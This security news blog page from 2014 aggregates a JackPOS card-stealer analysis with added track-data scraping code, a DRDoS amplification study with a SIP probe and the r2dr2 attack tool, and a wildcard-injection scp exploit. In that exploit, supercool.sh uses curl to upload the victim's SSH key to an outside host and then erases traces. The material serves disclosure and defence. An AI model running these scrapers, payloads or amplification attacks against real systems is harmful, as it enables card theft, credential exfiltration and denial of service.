Tuesday, June 24, 2014

Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

Here is a stack-based buffer overflow in the Android KeyStore service that affects Android 4.3 and below. The issue was fixed in Android 4.4.

The vulnerability is tracked as CVE-2014-3100. More details are available in the blog post at:
http://ibm.co/1pbk4yH

Ekoparty 10 Call For Papers

Call For Papers for the 10th edition of the Ekoparty Security Conference and Training, being held from October 29th through the 31st, 2014 in Latin America.
We are really proud to announce the tenth edition of the ekoparty security

This year is going to be special, as we are celebrating #eko10. We have an awesome new location, ekoCAMP for sleeping over and night activities, a bigger after party and many more special things.

ekoparty has become the most important technical conference in Latin America, and keeps offering the deepest knowledge in the field. We are expecting to bring together more than 3000 security specialists! If you have something to share, THIS is the right conference; you'll regret not being here this year.

During the 3-day high-voltage lectures you can also enjoy activities around the City, free WORKSHOPS, the most important CAPTURE THE FLAG in Latin America and, of course, our amazing parties! Also new in this #eko10:

* ekoCAMP: three days of high-voltage lectures not enough? Only for this tenth edition, you can camp at ekoparty! Stay all night playing the CTF!
* ekoparty will recognize the trajectory of Latin American researchers, as well as their greatest research. Stay tuned!

The CFP system is online at https://cfp.ekoparty.org
The ekoparty organization team kindly invites anyone interested in showing and sharing their research and/or developments in the field of Information Security.

Topics of interest include, but are not limited to, the following:

- 0 days
- Satellite Hacking
- Web Security
- Privacy
- Embedded Systems Technologies
- GSM, GPRS and CDMA Security
- RFID Security
- VoIP Security
- Lockpicking
- Wireless Security
- Exploitation
- IPv6 Security
- Attack and Defense Techniques
- Reverse Engineering
- Application Security, Testing, Fuzzing
- Code Auditing
- Virtualization Security
- Malicious Code
- Databases Security
- Packet Pungas
- Viruses, Worms, and Trojans
- e-crime, Phishing and Botnets
- Malware, Crimeware
- NSA’s Baby shower.
- Banking Security
- Phreaking
- Unit 61398 Asado techniques
- Hardware hacking
- Cryptography
- Forensics & AntiForensics
* All the lectures will be simultaneously translated, breaking any language barrier.

Full length talks (50 minutes)
Turbo talks (20 minutes)
Hands-on Workshops (120 minutes)
Trainings (1 or 2 days)
Night activities
Geek games
* Speakers including a Hands-on Workshop proposal earn extra points in the

Jun 18 - CFP is Open
Jul 31 - First round of selection
Aug 29 - CFP is Closed
October 27 & 28 - ekoparty trainings
October 29, 30 & 31 - ekoparty security conference

Speakers receive:
Round-trip airfare ticket
ekoparty's ASADO (BBQ)
Extra ticket to the conference

Trainers receive:
50% net profit of the Training
3 days accommodation
ekoparty's ASADO (BBQ)
Ticket to the conference

- We are looking for new activities to run in parallel to the conference, and also at night during ekoCAMP. Send us your proposal to:

Source: http://packetstorm.igor.onlinedirect.bg/papers/call_for/ekoparty10-cfp.txt

Askmen.com Website Allegedly Compromised Through Code Injection

Title: Askmen.com Website Allegedly Compromised Through Code Injection
Source: Ionut Ilascu, Softpedia
Date Published: 23 June 2014

"The portal is dedicated to providing news for men from domains
ranging from sports and health to social activity and entertainment.
According to their media page, there are more than 14 million readers
in U.S. alone, but the portal also has localized versions for UK,
Canada, Australia and the Middle East.
According to Websense, the landing page with the exploit is generated
automatically using a domain generation algorithm (DGA) that has been
cracked by the researchers, who also revealed the pages that would be
accessed until June 30."
Source: http://news.softpedia.com/news/Askmen-com-Website-Allegedly-Compromised-Through-Code-Injection-448032.shtml

AppSecEU 2014 live streaming

OWASP AppSec Europe 2014 will be presenting six (6) tracks of live content directly from the conference's main rooms. The event runs on June 25 and June 26, starting at 9:15 AM GMT+1 each day. And if you miss it, keep calm and watch later, since all the recorded content will be available in the following playlist:

Check out the official OWASP YouTube channel for live events notifications
This has been made possible by the AppSecEU 2014 Conference Team, the OWASP Media Project and the Münster University of Applied Sciences IT Security Lab.

JackPOS - Another Credit Card Stealer

In a previous blog post on Dexter, we briefly mentioned a new strain of point-of-sale (PoS) malware that has compromised over 4,500 credit cards in the United States and Canada. This new strain, dubbed JackPOS, was detected early this year and, between then and the time of writing, has had just one version, but with multiple variants.
In this blog post we look briefly at the unique attributes of JackPOS: its custom pattern matching and its command-and-control (C&C) communication. We conclude with quick remarks on the newest variant, found in April.

Custom Pattern Matching

As we have seen, PoS malware will first dump process memory, extract the Track 1 and/or Track 2 data, and finally exfiltrate the stolen information to a C&C server. PoS malware can extract track data using one of two approaches: custom pattern matching or regular expression matching.
Custom pattern matching gives the malware authors more control over which types of cards to target or filter out. JackPOS's custom pattern matching is unique in that it is more specific than other families such as Dexter: JackPOS will only grab cards from specific issuers. It does this by checking part of the Issuer Identification Number (IIN), which consists of the first few digits of the Primary Account Number (PAN).
The table below lists the leading IIN digits that JackPOS checks for and the corresponding card companies.
Table 1. Targeted IINs and credit card companies (table image not reproduced).

C&C Communication

JackPOS makes an HTTP GET request to the hardcoded URL http://[REMOVED]/post/echo and checks for the response "up". After confirming that the server is up and running, the infected machine registers itself with the C&C over HTTP on TCP port 80 using the standard WinINet APIs: InternetOpenW, InternetConnectW, HttpOpenRequestW and HttpSendRequestW.
The table below shows these APIs and the parameters used.
Table 2. The WinINet APIs and parameters (table image not reproduced).
The content of the HTTP field-value pairs is described below.
Table 3. The HTTP field-value pairs (table image not reproduced).
The figure below shows an example of credit card information being exfiltrated to the C&C server. As we can see, the Track 1 and Track 2 data are simply Base64-encoded.
Figure 1. Credit card information being exfiltrated by JackPOS (screenshot not reproduced).
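The two stages the post describes, the IIN-filtered track scraping and the Base64 exfiltration encoding, are easiest to reason about as code. The following is an added example written for this page, not JackPOS code or Fortinet's analysis tooling. It scans a constructed memory buffer for Track 1 and Track 2 records, keeps only PANs whose leading digits are in an IIN table and that pass the Luhn check, and decodes a Base64 body the way Figure 1 suggests an analyst would when reviewing proxy logs. The IIN table is illustrative (the post only shows JackPOS's real table as an image) and the track records are well-known test PANs, not real cards.

```python
import base64
import binascii
import re

# Illustrative IIN table (constructed for this example; JackPOS's real table
# is only shown as an image in the post): leading PAN digits -> card brand.
ISSUER_PREFIXES = {
    "34": "American Express", "37": "American Express",
    "4": "Visa",
    "51": "MasterCard", "52": "MasterCard", "53": "MasterCard",
    "54": "MasterCard", "55": "MasterCard",
    "6011": "Discover",
}

# Track 2: ';' PAN '=' YYMM service-code discretionary-data '?'
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")
# Track 1, format B: '%B' PAN '^' NAME '^' YYMM service-code discretionary '?'
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([^\^]{2,26})\^(\d{4})(\d{3})([^?]*)\?")


def luhn_ok(pan):
    """Luhn check-digit validation: the cheapest way to drop the false
    positives a bare regex over raw memory will otherwise produce."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def issuer_for(pan):
    """Longest-prefix match of the PAN's leading digits (the IIN) against the
    table; None means 'not a targeted issuer', which the scraper skips."""
    for length in (6, 4, 2, 1):
        brand = ISSUER_PREFIXES.get(pan[:length])
        if brand:
            return brand
    return None


def scan_memory(buf):
    """Return (track, pan, brand) for every track record in a memory buffer
    whose IIN is targeted and whose PAN passes Luhn: the 'custom pattern
    matching' stage of a JackPOS-style scraper."""
    hits = []
    for track, rx in ((1, TRACK1_RE), (2, TRACK2_RE)):
        for m in rx.finditer(buf):
            pan = m.group(1).decode()
            brand = issuer_for(pan)
            if brand and luhn_ok(pan):
                hits.append((track, pan, brand))
    return hits


def decode_exfil(body):
    """Reverse the exfiltration encoding the post describes (plain Base64)
    and re-scan the decoded bytes. Over proxy logs or PCAP payloads, a beacon
    body that decodes to track data is a strong indicator of this family."""
    try:
        plain = base64.b64decode(body, validate=True)
    except binascii.Error:
        return []
    return scan_memory(plain)


# Constructed sample of process memory: two well-known test PANs, one record
# that fails Luhn and one whose IIN is not in the table.
SAMPLE_MEMORY = (
    b"\x00\x00POS terminal v1.2\x00"
    b";4111111111111111=25121011234567890?\x00"          # Visa, track 2
    b"%B378282246310005^DOE/JOHN^2512101000000000?\x00"  # Amex, track 1
    b";4111111111111112=2512101?\x00"                    # fails Luhn
    b";9999888877776666=2512101?\x00"                    # IIN not targeted
    b"garbage\xff\xfe"
)

# Constructed exfil body, encoded the way Figure 1 describes.
SAMPLE_EXFIL = base64.b64encode(b";4111111111111111=25121011234567890?")

if __name__ == "__main__":
    for track, pan, brand in scan_memory(SAMPLE_MEMORY):
        print("track %d  %s  %s" % (track, pan, brand))
    print("decoded from exfil:", decode_exfil(SAMPLE_EXFIL))
```

The IIN check runs before the Luhn check on purpose: it is the cheaper test and mirrors the filtering order the post describes, where the malware only bothers with cards from the brands it wants. For defensive use, the same two regexes plus `luhn_ok` over a memory dump of the PoS process will surface track data in the clear, which is itself the condition this family depends on.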

The C&C Server Commands

The response from the C&C server can be one of three commands:
1) "update": download and update
   • Connects to http://{Removed}/post/download and downloads a file to the user's Application Data folder. The filename is selected from a list of strings in the malware body.
   Figure 2. List of filenames in the malware body (screenshot not reproduced).
   • Updates the autorun registry entries to point to the updated file.
2) "exec": download and execute. The command takes one parameter, the URL from which the executable will be downloaded.
   • Saves the executable to %Temp%\[filename].exe, then executes it.
3) "kill"
   • Deletes all registry entries associated with the malware.
   • Kills the malware process.

New Variant

In April, we acquired what appeared to be a new variant of JackPOS. After completing our analysis, we concluded that the sample from April varies only slightly from the original version. As we like to say, it is ‘old water with a new bottle’. The only significant difference is the fact that the April version is packed with a custom packing algorithm.
It is interesting to note that the strings showing the compilation path of the malware in the April version have been modified from the February version:
1) February version
   • C:\Users\ziedpirate.ziedpirate-PC\Desktop\sop\sop\Release\sop.pdb
   • C:\Users\ziedpirate.ziedpirate-PC\Desktop\sop\sop\Release\svchost.pdb
2) April version
   • I:\hack\dev\pos\sop\Release\sop.pdb
   • I:\hack\dev\pos\sop\Release\svhost.pdb
As we can see, the PDB strings in the February version revealed the Windows user account name of the malware author. From the change in these strings we can consider two possibilities: either (1) the project was moved and recompiled in an effort to correct this, or (2) the project source code is now in the hands of other malware authors.
Source: https://blog.fortinet.com/JackPOS-----Another-Credit-Card-Stealer/

HexorBase Audit Toolbox

"HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and brute-force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even Metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows ...
To install, simply run the following command in a terminal after changing
directory to the path where the downloaded package is:
root@host:~# dpkg -i hexorbase_1.0_all.deb"
Download: https://code.google.com/p/hexorbase/downloads/list

HITBSecConf2014 - Malaysia \o/


Topics of interest include, but are not limited to the following:
  • Cloud Security
  • File System Security
  • 3G/4G/WIMAX Security
  • SS7/GSM/VoIP Security
  • Security of Medical Devices
  • Critical Infrastructure Security
  • Smartphone / Mobile Security
  • Smart Card and Physical Security
  • Network Protocols, Analysis and Attacks
  • Applications of Cryptographic Techniques
  • Side Channel Analysis of Hardware Devices
  • Analysis of Malicious Code / Viruses / Malware
  • Data Recovery, Forensics and Incident Response
  • Hardware based attacks and reverse engineering
  • Windows / Linux / OS X / *NIX Security Vulnerabilities
  • Next Generation Exploit and Exploit Mitigation Techniques
  • NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security

White Paper:

If your presentation is short listed for inclusion into the conference program, a technical white paper must also be provided for review (3000 - 5000 words).

Please note:

We do not accept product or vendor related pitches. If you would like to showcase your company's products or technology, please email conferenceinfo@hackinthebox.org


Want to know the WIFI password for the Brasil World Cup security center?

World Cup WiFi Password

By William Knowles
Senior Editor
InfoSec News
June 24, 2014
The Jerusalem Post is reporting that the Rishon Lezion based security company RISCO Group is providing security management at the soccer stadium in Cuiaba, Brazil.
The state-of-the-art 41,000-seat Arena Pantanal, which cost $537 million to build, is one of the 12 host venues for the World Cup.
The project includes coordinating hundreds of Internet- protocol security cameras deployed in the stadium and its surroundings, lighting systems, gates and the PA system through a command and control center.
Three games have so far been played there in the tournament, all without incident.
…except for posting the WiFi code in a Twitter photo.


Since we began our studies in the Master's degree in ICT security at the European University, the possibility of doing a project under the guidance of Alejandro Ramos (@aramosf), a professional in the scene whom we admire, drew our attention. After several ideas and proposals from both sides, we decided to do a project on finding new attack vectors for distributed reflection denial of service (DRDoS) attacks. This blog recently covered the subject in an article focused on an SNMP vulnerability, and also published a tool to exploit it.
We set ourselves the objective of finding new amplification vectors in various protocols. First we researched the already known vulnerabilities published by CERTs and by some computer security communities. We quickly realized the technical constraints a candidate vulnerability had to satisfy: UDP-based, no authentication, an amplification of at least 2 times the bytes sent, implemented on a large number of hosts... and still undiscovered.

We classified our search into three frames where to look: 
  • Common UDP-based protocols (such as DNS or NTP) 
  • Media streaming and game platforms. 
  • Private Applications that use UDP
Most undocumented protocols are just strings of bytes in and out. Each byte means something, but if the protocol is proprietary, only the developer knows the meaning. After months of analysis, and some frustration, we managed to take advantage of several UDP-based implementations that can be used for large-scale attacks:

SIP protocol: OPTIONS method

SIP is a signaling protocol for VoIP whose messages are modelled on HTTP. The main difference, apart from its purpose, is that SIP can operate over UDP on port 5060. A Shodan search showed over 40 million devices exposed. Digging through the RFC we concluded that the OPTIONS request could be reduced to a few bytes while still obtaining an amplified response. Servers that answer OPTIONS with SDP information can give a large amplification factor.


The returned messages had an average amplification factor of 5 times for every byte sent, slightly above some of the protocols published by US-CERT. Today there are over 2 million hosts with this amplification factor, so a highly distributed attack could make a dent in a big company.

Amplification in mobile games
The growth of multiplayer games is something that excited us; it is a very interesting area to research. However, many of these games do not use UDP as their transport, preferring APIs over TCP. Fortunately, most interactive games tend to use UDP, and here we found serious vulnerabilities with quite high amplification factors, some of them 500 to 700 times per byte sent. The problem is that those services are usually not large enough to be considered hazardous. Additionally, some mobile gaming platforms such as exitgames.com implement a triple handshake over UDP, which completely prevents such attacks.


Citrix ICA protocol amplification

In an almost obsessive quest for large amplification factors, we detected a property of a proprietary protocol that had not been considered as a possible UDP amplification vector. The affected protocol is Citrix ICA, designed for shared application servers.

One feature of certain versions of the protocol is to tell the client which published applications exist, and also which servers are available. This message is transmitted over UDP on port 1604 and does not implement authentication. When the list of applications and servers is large enough, this information disclosure becomes a DRDoS attack vector.


With a simple 84-byte payload, a response with an amplification factor of 25 to 40 times for every byte sent is received. The interesting thing about this vulnerability is that in our discovery phase we detected over 12,000 Citrix servers and confirmed that at least 2,000 were vulnerable.
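Both the SIP and the Citrix ICA findings above come down to the same measurement: bytes received divided by bytes sent for one unauthenticated UDP datagram. The following is an added example, not r2dr2 or any code from the authors, that builds the minimal OPTIONS request the SIP section describes (RFC 3261 mandates Via, From, To, Call-ID, CSeq and Max-Forwards; the compact header names shrink it further) and measures the bandwidth amplification factor (BAF) against a local stand-in server so it runs offline. The 200 OK with SDP body is constructed for this example and is not a capture from any real server. `measure_baf` takes any payload, so the same function serves for the 84-byte ICA query, whose bytes are not given on this page and are therefore not reproduced here. Note the probe sends from the real socket address: it measures amplification on a server you control and does not spoof a source, which is the part that turns a measurement into a reflection attack.

```python
import socket
import threading

# Constructed SDP body and 200 OK, roughly what a PBX that answers OPTIONS
# with its media capabilities returns. Not captured from any real server.
_SDP = (
    b"v=0\r\n"
    b"o=- 1 1 IN IP4 192.0.2.10\r\n"
    b"s=session\r\n"
    b"c=IN IP4 192.0.2.10\r\n"
    b"t=0 0\r\n"
    b"m=audio 10000 RTP/AVP 0 8 9 18 101\r\n"
    b"a=rtpmap:0 PCMU/8000\r\n"
    b"a=rtpmap:8 PCMA/8000\r\n"
    b"a=rtpmap:9 G722/8000\r\n"
    b"a=rtpmap:18 G729/8000\r\n"
    b"a=rtpmap:101 telephone-event/8000\r\n"
    b"a=sendrecv\r\n"
)
SAMPLE_SIP_200_OK = (
    b"SIP/2.0 200 OK\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.1:5060;branch=z9hG4bK1;received=192.0.2.1\r\n"
    b"From: <sip:a@b>;tag=1\r\n"
    b"To: <sip:a@b>;tag=as7e3c1f2a\r\n"
    b"Call-ID: 1\r\n"
    b"CSeq: 1 OPTIONS\r\n"
    b"Server: Example-PBX/1.0\r\n"
    b"Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO\r\n"
    b"Supported: replaces, timer, 100rel, path\r\n"
    b"Accept: application/sdp\r\n"
    b"Content-Type: application/sdp\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_SDP)
) + _SDP


def build_options_probe(target, src="192.0.2.1", port=5060):
    """Smallest OPTIONS request a compliant UAS must answer (RFC 3261 8.1.1),
    using compact header names (v, f, t, i, l). Via/From/Call-ID values are
    dummies; the datagram still leaves from this process's real address."""
    return (
        b"OPTIONS sip:%s SIP/2.0\r\n"
        b"v: SIP/2.0/UDP %s:%d;branch=z9hG4bK1\r\n"
        b"f: <sip:a@b>;tag=1\r\n"
        b"t: <sip:a@b>\r\n"
        b"i: 1\r\n"
        b"CSeq: 1 OPTIONS\r\n"
        b"Max-Forwards: 70\r\n"
        b"l: 0\r\n\r\n"
    ) % (target.encode(), src.encode(), port)


class FakeSipServer(threading.Thread):
    """Local stand-in for a SIP server: answers the first datagram with the
    canned 200 OK so the measurement can run without a real PBX."""

    def __init__(self, response):
        super().__init__(daemon=True)
        self.response = response
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.settimeout(5)
        self.addr = self.sock.getsockname()

    def run(self):
        try:
            _, peer = self.sock.recvfrom(2048)
            self.sock.sendto(self.response, peer)
        except socket.timeout:
            pass
        finally:
            self.sock.close()


def measure_baf(payload, addr, wait=0.5):
    """Send one datagram and add up every byte that comes back within `wait`
    seconds (a reflector may answer with several datagrams).
    Returns (baf, bytes_sent, bytes_received)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(wait)
    received = 0
    try:
        sock.sendto(payload, addr)
        while True:
            data, _ = sock.recvfrom(65535)
            received += len(data)
    except socket.timeout:
        pass
    finally:
        sock.close()
    return received / len(payload), len(payload), received


def demo():
    """Run the probe against the local stand-in and return its BAF."""
    server = FakeSipServer(SAMPLE_SIP_200_OK)
    server.start()
    probe = build_options_probe("127.0.0.1")
    result = measure_baf(probe, server.addr)
    server.join()
    return result


if __name__ == "__main__":
    baf, sent, got = demo()
    print("sent %d bytes, received %d bytes, BAF %.1f" % (sent, got, baf))
```

On a real PBX, point `measure_baf` at its address with the same probe; anything above 1.0 on an Internet-facing UDP 5060 is worth rate limiting or moving behind an SBC, and the `Allow`/`Supported`/SDP lines in the reply are exactly what inflates the factor.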

Operating Tool: r2dr2 DRDoS attack tool

To build our proof of concept, we developed a full-featured UDP amplification attack program called "r2dr2". The main difference from other tools is that it takes its configuration from a JSON file, where you can specify the payload for each service in hexadecimal, which makes it highly customizable. Our aim is for the tool to be able to exploit vulnerabilities found not only by us but also by any other researcher; we have found that it works very well with many protocols.

The following video demonstrates, in a real environment, a distributed UDP amplification attack using only 10 Citrix ICA servers that can deny service to a real server on the Internet.
Configuring payloads on r2dr2: this video exploits only the Citrix ICA information disclosure vulnerability, with a bandwidth amplification factor of almost 25 to 45, but in the JSON file that r2dr2 reads you can configure many more payloads from different services and set the number of times each IP is used. This example shows the payloads required for amplification with the Citrix ICA UDP, SIP, CHARGEN and NTP protocols.

Download JSON configuration file for r2dr2
Download application: r2dr2 DRDoS UDP Amplification

This project has taught us much more than we expected; that is the final conclusion. Finding vulnerable protocols is not a trivial task, but as we demonstrated in the video, the effectiveness is high. There will be ways to carry out DRDoS attacks for a long time; mitigation depends on the talent and budget of each organization.

Daniel Ferreira (@daniel0x00)
Pablo Alobera (@IllegalPointer)


Open Source Digital Forensics Conference (OSDFCon)

#OSDFCon Open Source Digital Forensics Conference
The 5th Annual Open Source Digital Forensics Conference (OSDFCon) will be held on November 5, 2014 at the Westin Washington Dulles in Herndon, VA.  This conference focuses on tools and techniques that are open source and (typically) free to use.  It is a one day event with short talks packed with information.  There are both tool developers and users in attendance, and this is a unique opportunity to learn about new tools and provide feedback.
As an investigator, you should attend to learn about new tools and meet the developers building the software.  As a developer, you should attend to raise awareness of your efforts. Everyone should consider submitting a talk to share their experiences and work.

Getting Involved

The final program will be available in July.
We’ll post updates on Twitter using #osdfcon.
Developers can submit modules to the Autopsy Module Writing Contest for cash prizes. Submissions are due by October 20, 2014.

Exploiting Wildcard Expansion on Linux

Wildcard Expansion

When you type a command with a "*" in bash, bash expands it to the list of all files in the current directory and passes them all as separate arguments to the program. For example, "rm *" will remove every file in the current directory.

Filenames Misinterpreted as Switches

Most command line programs take switches that affect how they work. For example, the ls command, when run without any switches, produces the output below.
[stephen@superX foo]$ ls 
asdf.txt  foobar  -l 
Now let's say you want to know what group and user owns these files. You can pass "-l" to the ls program to figure that out, which looks like this:
[stephen@superX foo]$ ls -l 
total 0 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 -l 
Notice there is a file named -l in our directory. Let's try "ls *" now and see what happens:
[stephen@superX foo]$ ls * 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar
The last two outputs are similar, but the output of "ls *" is different: it is missing the "-l" file, which ls interpreted as the "-l" switch. There's no way for the ls program to tell that the "-l" came from wildcard expansion and wasn't what we intended. It's equivalent to running:
[stephen@superX foo]$ ls asdf.txt foobar -l
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 asdf.txt 
-rw-r--r-- 1 stephen stephen 0 Jun 20 19:10 foobar

Security Problems

Misinterpreted filenames can lead to problems when someone runs a wildcard expansion on a folder they download from the Internet, for example, without first checking the filenames. Could this be used to attack someone's computer? Can we make a program do something bad by having specially-named files in the directory? Yes, it turns out that we can.

Known Issue

This problem is well-known, but it still surprises a lot of people. There has been some discussion of it on the Full Disclosure mailing list.
Generally we're told that this is a "feature", and that doing anything else would be even more surprising and harder to understand for someone who really understands what's going on. Even if that's the case, if lots of people misunderstand it, and those people can be exploited as a result, then it should be considered a security vulnerability, either in the design or in the documentation.
The posting to Full Disclosure demonstrates how wildcard expansion can be abused to make a user delete files they didn't intend to. That's annoying, but not too severe a problem. What we really want is to turn an improper use of "*" into code execution, and that's what we've done.

Proof of Concept Exploit

To show that it's possible to turn this problem into an arbitrary code execution attack, we attack the "scp" command. The scp command provides the "-o" option, which passes a configuration option to ssh. Luckily, ssh has a configuration option that involves running a command. We can take advantage of this to get our script running.
Suppose we have control over the contents of a directory, and inside that directory our victim will run the following command. Imagine, for example, that the user just downloaded a web application's source code from the attacker's website and is uploading the files to their web server.
$ scp * user@example.org:/var/www/
To exploit this command, we place the following files in the directory:
  • "-o" - SCP will interpret this file as the "-o" switch.
  • "ProxyCommand sh supercool.sh %h %p" - SCP will interpret this file's name as the argument to the "-o" switch.
  • "supercool.sh" - The script that will run, containing the attacker's code.
  • "zzz.txt" - Another file in the directory which serves no purpose for the exploit.
It's okay to have more files in the directory, as long as none of their names sort between "-o" and "ProxyCommand", or before "-o". Where they sort depends on the shell's locale: in a typical UTF-8 locale, collation ignores the leading dash and case, so "-o" sorts among the names beginning with "o" and anything starting with "o" or "p" could get in the way; in the C locale the sort is by byte value, so "-o" comes first and any name starting with a digit or an uppercase letter before "P" would land between the two. Either way, the very suspicious "ProxyCommand" file will show up near the top of the directory listing, which probably makes real attacks difficult if the user does look. The defence on the user's side is to stop the program from ever seeing expanded names as options: end option parsing with "--" (scp -- * user@example.org:/var/www/) or write the glob as "./*" so every expanded name begins with "./".
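The mechanism does not need scp or a network to observe. The following is an added example, not part of the original post, in which a small getopts-based function stands in for scp's option parser (it accepts "-o VALUE" the way scp does and nothing else), a temporary directory is staged with the four filenames from the post, and the function is called with a naked "*", with "-- *" and with "./*". The collation is pinned to the C locale so the glob order is reproducible.

```sh
#!/bin/sh
# Added example, not from the original post. fake_scp is a stand-in for scp's
# option parser; stage_dir recreates the attacker-controlled directory from
# the post; run_case shows what the "tool" receives from a naked "*" compared
# with the two standard defences, "-- *" and "./*".

stage_dir() {
    d=$(mktemp -d)
    : > "$d/-o"
    : > "$d/ProxyCommand sh supercool.sh %h %p"
    : > "$d/supercool.sh"
    : > "$d/zzz.txt"
    printf '%s\n' "$d"
}

# Prints two lines: the value parsed for -o (empty if none) and the number
# of remaining operands the program would treat as files to copy.
fake_scp() {
    OPTIND=1
    o_value=""
    while getopts "o:" opt; do
        case $opt in
            o) o_value=$OPTARG ;;
            *) return 2 ;;
        esac
    done
    shift $((OPTIND - 1))
    printf '%s\n%s\n' "$o_value" "$#"
}

# $1 selects the expansion style: naked | dashdash | dotslash
run_case() {
    d=$(stage_dir)
    (
        cd "$d" || exit 1
        export LC_ALL=C    # fixed collation so the glob order is reproducible
        case $1 in
            naked)    fake_scp * ;;
            dashdash) fake_scp -- * ;;
            dotslash) fake_scp ./* ;;
        esac
    )
    rm -rf "$d"
}

optvalue_for() { run_case "$1" | sed -n 1p; }
operands_for() { run_case "$1" | sed -n 2p; }

for style in naked dashdash dotslash; do
    printf '%-9s -o=[%s] operands=%s\n' "$style" \
        "$(optvalue_for "$style")" "$(operands_for "$style")"
done
```

With the naked glob the parser reports "-o" set to "ProxyCommand sh supercool.sh %h %p" and only two operands left (supercool.sh and zzz.txt), which is exactly the argument vector scp would hand to ssh; with "--" or "./*" it sees no option and four operands.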
Inside "supercool.sh", we have a script that will do what "ProxyCommand" is supposed to do, along with some malicious commands:

# Upload their SSH public key to the Internet, and put a scary message in /tmp/.
echo "By @DefuseSec and @redragonx..." > /tmp/you-have-been-hacked.txt
echo "This could have been your private key..." >> /tmp/you-have-been-hacked.txt
curl -s -d "jscrypt=no" -d "lifetime=864000"                                \
        -d "shorturl=yes" --data-urlencode "paste@$HOME/.ssh/id_rsa.pub"    \
        https://defuse.ca/bin/add.php -D - |                                \
        grep Location | cut -d " " -f 2 >> /tmp/you-have-been-hacked.txt

# Delete evidence of our attack.
rm ./-o ProxyCommand\ sh\ supercool.sh\ %h\ %p 
echo > ./supercool.sh

# Do what ProxyCommand is supposed to do.
nc -p 22332 -w 5 $1 $2
When the victim runs their scp command, it will appear successful:
$ scp * user@example.org:/var/www/
But, when the user checks their /tmp/ directory, they'll see our message:
$ cat /tmp/you-have-been-hacked.txt 
By @DefuseSec and @redragonx...
This could have been your private key...
You can download the entire proof of concept directory in a .zip file here. Be careful, and have fun!
This was written by @RedragonX and @DefuseSec.

Saturday, June 21, 2014

Travel by Drone.

A few days ago we showed a fantastic project in the world of drones. This new drone concept will serve the user autonomously, allowing sports (and other) activities to be filmed without having to control it. That will make incredible footage possible.
Drones bring the magic of aerial footage to ordinary people, without great cost or a great arsenal of equipment. Since they capture fantastic footage, there is now a website where it can be posted and shared, called Travel by Drone.

This service is really interesting: it lets us watch videos from all over the world, from the most conventional to the most bizarre, recorded from a perspective that only drones can give us.

As the technique becomes commonplace, we get access to footage of places that would otherwise be hard to reach, which gives us fantastic YouTube videos.
It won't be long before these drones are everywhere recording, and we'll have footage from the whole world... and speaking of Brazil...

There are already thousands of videos, from places you never imagined existed on our planet. There are films of volcanic eruptions, of holidays in the Caribbean, all within your reach. Open TravelByDrone and navigate the world map; the pins on each place indicate that a video exists there.

Anyone can post their work on Travel by Drone; all you need to do is provide the location where the recording took place, the URL of the video and a contact email. For security reasons all videos have to be inspected by the team running the service, since the idea is to guarantee that the footage was recorded by a drone and not by any other means, and only then is it placed on the map. On the right-hand side are the most recent videos.

Europe already has many; I don't know whether the United States or Europe has more videos, but it's fascinating to see footage from every country and from very curious angles. Form your own opinion at TravelByDrone.

Source: http://pplware.sapo.pt/internet/travel-by-drone-veja-o-mundo-pelos-olhos-dos-drones/

Rabbit-hole WIFI

About Us

Rabbit-hole was created in order to provide a community environment to those individuals working on the fringes of existing UAV communities. Rabbit-hole.org is for project/ideas that may not be tolerated or understood by the common hobbyist. That being said, let me make a very important point clear: We DO NOT support or condone any illegal activity. Some ideas presented on rabbit-hole MAY have potential illegal applications, but they also have legal applications as well. We do not tolerate discussions supporting or related to the commission of actual illegal activities.

We are two guys with backgrounds in computer security. When we get bored, it’s almost always a recipe for trouble. This recipe started cooking back in October of 2009 and the results were something we call the Wireless Aerial Surveillance Platform. It’s an autonomous Unmanned Aerial Vehicle (UAV) that we built in our garage with onboard war-driving gear, among other things.

It didn’t take long before we decided Wi-Fi networks weren’t enough. So we added Bluetooth, Cellular, and imaging capabilities that we can easily add and remove based on our needs. It all plugs into an onboard USB hub, so the possibilities are infinite. Oh, and we’re not Dutch. Mike (a.k.a. RedQueen) lives in Indiana. Rich (a.k.a. WhiteQueen) lives in Illinois. We’re Midwest, corn-fed Americans. Not that there’s anything wrong with being Dutch.

Our goals were relatively simple. We wanted it to be cheap enough that we wouldn’t go broke building it. Not wanting to scratchbuild every component, it needed to use as much off-the-shelf equipment as possible. It needed to fly long enough to be able to do something interesting. One person should be able to load it in and out of a station wagon without any special equipment. Finally, and most importantly, we wanted anyone to be able to follow in our footsteps without needing to be a PhD, electrical engineer, or aeronautical engineer.

The airframe is a surplus U.S. Army target practice drone. A DIY Drones “ArduPilot” (based on the popular Arduino) controls the avionics. An onboard Via Epia Pico ITX PC with a Via C7 500 MHz CPU with 1 GB RAM, running the Backtrack 4 suite provides the “surveillance” capabilities. It communicates with a ground station for real-time tracking, payload interaction, flight operations, and data download. An ArduStation in the base station receives the telemetry data. The base station allows us to establish a Secure Shell link via a PPP tunnel. Additionally, it can serve as a network router for connecting additional workstations to the payload system.

